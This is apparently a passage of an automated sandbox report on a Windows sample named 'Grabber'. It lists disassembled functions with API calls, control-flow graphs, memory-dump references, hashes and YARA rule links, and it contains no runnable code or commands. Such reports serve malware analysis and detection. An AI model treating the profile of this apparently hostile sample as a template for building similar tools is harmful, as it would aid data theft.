                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408DFB
                                                                                                                                                                                                                          • InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00408E1D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CommonControlsInitInitializememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2179856907-0
                                                                                                                                                                                                                          • Opcode ID: 91c7401402fa2f0ea5928b71181181df8ef358baa4c0a6ad788b24867e7e8746
                                                                                                                                                                                                                          • Instruction ID: d18f3e268914b4fee2ab689e9e6bda8f6ab82eec5aee9dd7765ec6ce908ab83c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91c7401402fa2f0ea5928b71181181df8ef358baa4c0a6ad788b24867e7e8746
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12E08CB088430CBBEB009BD0DC0EF8DBB7CEB00315F0041A4F904A2280EBB466488B95
                                                                                                                                                                                                                          Function 004098C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 784 4098c0-4098c5 785 4098c7-4098cd 784->785 786 4098df 784->786 787 4098d4-4098d9 SetEnvironmentVariableW 785->787 788 4098cf 785->788 787->786 788->787
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetEnvironmentVariableW.KERNELBASE(02199F70,02199F70,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnvironmentVariable
                                                                                                                                                                                                                          • String ID: $0A
                                                                                                                                                                                                                          • API String ID: 1431749950-513306843
                                                                                                                                                                                                                          • Opcode ID: 1c567db1f8ae5e831e25467e71350c4bb5df89e506d1786ab4261c5f7a60237e
                                                                                                                                                                                                                          • Instruction ID: a83057451cf148fd94e5dae0918d05dd15dd477b401c26288c9a060c20ad275f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c567db1f8ae5e831e25467e71350c4bb5df89e506d1786ab4261c5f7a60237e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7C01231619201BBD710EA14C904B57BBE5EB50345F04C439B044912B0C338CC44D705
                                                                                                                                                                                                                          Function 0040ADC0 Relevance: 3.1, APIs: 2, Instructions: 65memoryfileCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 789 40adc0-40add9 call 40d498 792 40ae6e-40ae73 789->792 793 40addf-40adfe CreateFileW 789->793 794 40ae00-40ae02 793->794 795 40ae52-40ae55 793->795 794->795 796 40ae04-40ae0b 794->796 797 40ae57 795->797 798 40ae59-40ae60 call 40d40a 795->798 800 40ae20 796->800 801 40ae0d-40ae1e HeapAlloc 796->801 797->798 802 40ae65-40ae6b 798->802 803 40ae23-40ae4a 800->803 801->803 804 40ae4c 803->804 805 40ae4e-40ae50 803->805 804->805 805->795 805->802
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040D498: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D4A3
                                                                                                                                                                                                                            • Part of subcall function 0040D498: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D51E
                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000), ref: 0040ADF3
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,00001000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040AE15
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$AllocCreateEnterFileHeapLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3705299215-0
                                                                                                                                                                                                                          • Opcode ID: e305dac00e43d1f01632c500e63f0068ba79cd60e0177f680cb6723e5d67acda
                                                                                                                                                                                                                          • Instruction ID: 12139a0eb1477c71ece9156acb4b07c5ee84e209973367f4cf7a68f803bf58ce
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e305dac00e43d1f01632c500e63f0068ba79cd60e0177f680cb6723e5d67acda
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1119331140300ABC2305F1AEC44B57BBF9EB85764F14863EF5A5A73E0C7759C158BA9
                                                                                                                                                                                                                          Function 0040DBCA Relevance: 3.1, APIs: 2, Instructions: 61memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 806 40dbca-40dbe1 call 40dd1d 809 40dbe7-40dc04 RtlAllocateHeap 806->809 810 40dc69-40dc6e 806->810 811 40dc06-40dc4c memset call 411a64 809->811 812 40dc68 809->812 811->812 815 40dc4e-40dc50 811->815 812->810 815->812 816 40dc52-40dc54 815->816 817 40dc58-40dc62 call 411e8f 816->817 820 40dc64 817->820 820->812
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040DD1D: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040DBDB,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 0040DD5E
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 0040DBFA
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DC35
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocateFreememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2774703448-0
                                                                                                                                                                                                                          • Opcode ID: 5a98dcc60eb41190d4dd3f8e51887e861c9e07386c3483abd70395c86239bf10
                                                                                                                                                                                                                          • Instruction ID: c1bdd2e89517895a38d7a8cc2bcc280f97e8981c2924b00dcd90f9207400bfe8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a98dcc60eb41190d4dd3f8e51887e861c9e07386c3483abd70395c86239bf10
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E51167729043149BC320DF59DC80A8BBBE8EF88B10F01492EB988A7351D774E804CBA5
                                                                                                                                                                                                                          Function 00401FA9 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00402000
                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 0040200B
                                                                                                                                                                                                                            • Part of subcall function 004053C7: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000), ref: 004053D7
                                                                                                                                                                                                                            • Part of subcall function 00405436: TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405446
                                                                                                                                                                                                                            • Part of subcall function 00405436: EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405452
                                                                                                                                                                                                                            • Part of subcall function 00405436: LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405486
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalDirectoryRemoveSection$EnterLeaveObjectSingleTerminateThreadValueWait
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1205394408-0
                                                                                                                                                                                                                          • Opcode ID: cbf9c02a299cce853fa8afa1118c476f8ea06bf817103c663cdc69cc5dfa62d5
                                                                                                                                                                                                                          • Instruction ID: f8114c552bbb016f0a76c43bd4124e9f0fb198a1ce0b642fe03d48e839951556
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbf9c02a299cce853fa8afa1118c476f8ea06bf817103c663cdc69cc5dfa62d5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36F0C030414505AADA257B32EC8299A7E36EB08308B42C43FF440714F2CF3E9D69AE5D
                                                                                                                                                                                                                          Function 0040DE30 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE3C
                                                                                                                                                                                                                          • TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE47
                                                                                                                                                                                                                            • Part of subcall function 0040E6A0: HeapAlloc.KERNEL32(02190000,00000000,0000000C,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6AE
                                                                                                                                                                                                                            • Part of subcall function 0040E6A0: HeapAlloc.KERNEL32(02190000,00000000,00000010,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6C2
                                                                                                                                                                                                                            • Part of subcall function 0040E6A0: TlsSetValue.KERNEL32(0000000D,00000000,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6EB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocHeap$CreateValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 493873155-0
                                                                                                                                                                                                                          • Opcode ID: f31918e335419563cb91e7816fe34751be6fcb3fb2708b1ef5dadcb8cb13decf
                                                                                                                                                                                                                          • Instruction ID: f6fb69b35e6ce2edff263c55ffd8902d3e18a9f91630c6f11d167ca4d15ccc07
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f31918e335419563cb91e7816fe34751be6fcb3fb2708b1ef5dadcb8cb13decf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4ED012309C8304ABE7402FB1BC0A7843B789708765F604835F509572D1D9BA6090495C
                                                                                                                                                                                                                          Function 0040A7B9 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000002,00000080,0040A7F2,02199F70,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040A7D0
                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(00000000,0040A7F2,02199F70,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040A7DA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$AttributesDelete
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2910425767-0
                                                                                                                                                                                                                          • Opcode ID: d362f7088f03a7c0c281f2bbae1f9f88548ac7f83f4d98d140da13098a0d0c91
                                                                                                                                                                                                                          • Instruction ID: f7dd43ce8ab679ab9acf2fbd66ade7664d9bbbd5be98dbe0a51a073a4b2bc51f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d362f7088f03a7c0c281f2bbae1f9f88548ac7f83f4d98d140da13098a0d0c91
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00D09E30408300B6D7555B20C90D75ABAF17F84745F14C43AF485514F1D7798C65E70A
                                                                                                                                                                                                                          Function 0040DE60 Relevance: 3.0, APIs: 2, Instructions: 10memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapDestroy.KERNELBASE(02190000,?,004011AF,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098), ref: 0040DE69
                                                                                                                                                                                                                          • TlsFree.KERNELBASE(0000000D,?,004011AF,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098), ref: 0040DE76
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DestroyFreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3293292866-0
                                                                                                                                                                                                                          • Opcode ID: e1e86a498c82862297bb4ba2eeef0c9791047cff053e7cc11c8159107c07dceb
                                                                                                                                                                                                                          • Instruction ID: 39e23e6c0b6f630abd0a78494d594864f6bb0b6a3747c7bb50b876903a384421
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1e86a498c82862297bb4ba2eeef0c9791047cff053e7cc11c8159107c07dceb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94C04C71158304ABCB049BA5FC488D57BBDE74C6153408564F51983661CA36E4408B58
                                                                                                                                                                                                                          Function 0040A9D0 Relevance: 2.5, APIs: 2, Instructions: 31memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040AA13
                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040AA1B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseFreeHandleHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1642312469-0
                                                                                                                                                                                                                          • Opcode ID: 579ea7bb730054d1301fd9c1686cb7efab9d423d292c410d1af4f5f5553bf1d6
                                                                                                                                                                                                                          • Instruction ID: 9ff7f62518d4b0577bac71a3516b051fbd3d19e36237879e48dc57cbe5217eec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 579ea7bb730054d1301fd9c1686cb7efab9d423d292c410d1af4f5f5553bf1d6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0F05E32600200A7CA216B5AED05A8BBBB2EB85764B11853EF124314F5CB355860DB5D
                                                                                                                                                                                                                          Function 00402BFA Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                                                                                                                                                                                                            • Part of subcall function 00409BA0: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1
                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(02199F70,02199F70,00002710), ref: 00402C34
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                            • Part of subcall function 00409B80: HeapFree.KERNEL32(00000000,00000000,00401B6B,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00409B8C
                                                                                                                                                                                                                            • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                            • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                                                                                                                                                                                                            • Part of subcall function 0040DF50: HeapFree.KERNEL32(02190000,00000000,00000000,?,00000000,?,00411DE4,00000000,00000000,-00000008), ref: 0040DF68
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 192546213-0
                                                                                                                                                                                                                          • Opcode ID: 1f36478916e75dc19802576b6717a84d5ffab4db83f33051ef68578c82d7535e
                                                                                                                                                                                                                          • Instruction ID: 7a2999830b1481a9d7ef80217fec4737815e267699ad494388d5f61b71452053
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f36478916e75dc19802576b6717a84d5ffab4db83f33051ef68578c82d7535e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6012D75508201BAE5007BA1DD06D3F76A9EFD0718F10CD3EB944B50E2CA3D9C599A5E
                                                                                                                                                                                                                          Function 0040AA40 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040AA08,00000000,00000000,?,?,004033E8,00000000,00000000,00000800), ref: 0040AA67
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                                          • Opcode ID: da5ca93210413f8561433c219da2a3ea233fc89f057aa1d005b42788aa018882
                                                                                                                                                                                                                          • Instruction ID: b59f1f917ceac4f5cea587e7357412edb8aff685aadda2d04846933fd6210d73
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da5ca93210413f8561433c219da2a3ea233fc89f057aa1d005b42788aa018882
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AF09276105700AFD720DF58D948F97BBE8EB58721F10C82EE69AD3690C770E850DB61
                                                                                                                                                                                                                          Function 00402BC1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402BDD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
